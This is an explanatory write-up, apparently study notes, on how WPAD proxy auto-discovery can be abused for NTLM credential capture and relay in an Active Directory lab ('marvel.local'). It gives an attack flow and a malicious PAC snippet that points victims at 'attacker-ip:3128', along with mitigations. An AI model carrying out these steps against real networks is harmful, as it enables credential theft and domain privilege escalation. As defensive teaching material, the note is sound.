WPAD

WPAD (Web Proxy Auto-Discovery Protocol) is a protocol used by devices (especially Windows clients) to automatically detect proxy server settings on a network. It allows web browsers and other clients to locate a proxy configuration file (usually a PAC file) without user interaction.

🔧 How WPAD Works:

1. Client joins a network and wants to access the internet.

2. It tries to discover a proxy by looking for a PAC file at:

   Copy

   arduinoCopyEdithttp://wpad.domain.com/wpad.dat

3. The client can find wpad.dat using:

   • DHCP Option 252 (if configured)

   • DNS — the most common method.

If successful, the client configures itself to use the proxy defined in that file.

💀 Why Is WPAD Dangerous?

Attackers abuse WPAD for credential theft and NTLM relay attacks:

• If wpad.domain.com is not registered, an attacker can:

  • Register it on a public DNS (for external attacks).

  • Set up a fake DNS server or poison local DNS (for internal attacks).

• The attacker sets up a malicious proxy server and hosts a fake wpad.dat.

• Windows clients automatically authenticate to the proxy using NTLM.

• This allows the attacker to capture or relay NTLM credentials (e.g., using ntlmrelayx.py).

🔥 Example Attack Flow:

1. Attacker sets up fake DNS that resolves wpad.company.local to their IP.

2. Victim connects and fetches wpad.dat.

3. Victim’s system tries to authenticate via NTLM to the proxy.

4. Attacker captures and relays the authentication to a target (e.g., LDAP server).

5. If successful, attacker can escalate privileges or extract sensitive info.

✅ Mitigations:

• Disable WPAD on endpoints.

• Block WPAD DNS lookups for unregistered subdomains.

• Configure Group Policy to prevent automatic proxy detection.

• Enforce LDAP/SMB signing and disable NTLM where possible.

🏢 Active Directory Scenario: WPAD Abuse + NTLM Relay

Imagine you're on a Windows domain (AD) network — say, marvel.local.

👥 Characters in the Scene:

🧠 What Happens Normally with WPAD in AD?

• A Windows client, like victim.marvel.local, tries to auto-discover proxy settings.

• It sends a DNS request:

  Copy

  nginxCopyEditGET http://wpad.marvel.local/wpad.dat

• If wpad.marvel.local doesn’t exist, it fails silently.

BUT...

💀 What Happens When an Attacker Exploits This?

🔓 Misconfig 1: No wpad.marvel.local exists in DNS

🔓 Misconfig 2: Clients are allowed to auto-authenticate using NTLM

🔓 Misconfig 3: Services like LDAPS or SMB don’t require signing

💣 Attacker Steps (NTLM Relay via WPAD in AD):

1. Attacker sets up fake DNS or IPv6 takeover that resolves wpad.marvel.local to their own IP.

2. Victim’s Windows machine auto-requests the PAC file from:

   Copy

   arduinoCopyEdithttp://wpad.marvel.local/wpad.dat

3. Attacker’s server responds with a malicious PAC file that says:

   Copy

   javascriptCopyEditfunction FindProxyForURL(url, host) {
       return "PROXY attacker-ip:3128";
   }

4. Victim’s browser or system sends traffic through attacker’s proxy.

5. Windows auto-authenticates to this proxy using NTLM.

6. Attacker captures the NTLM handshake.

7. Attacker relays NTLM credentials to the domain controller (dc.marvel.local) over LDAP or SMB using ntlmrelayx.py.

🔓 If the DC doesn’t require LDAP signing:

• Attacker can:

  • Dump user info

  • Add a new domain admin

  • Enable RDP on any machine

  • Persist in AD

🛡️ Defense for AD Admins:

🎯 Summary: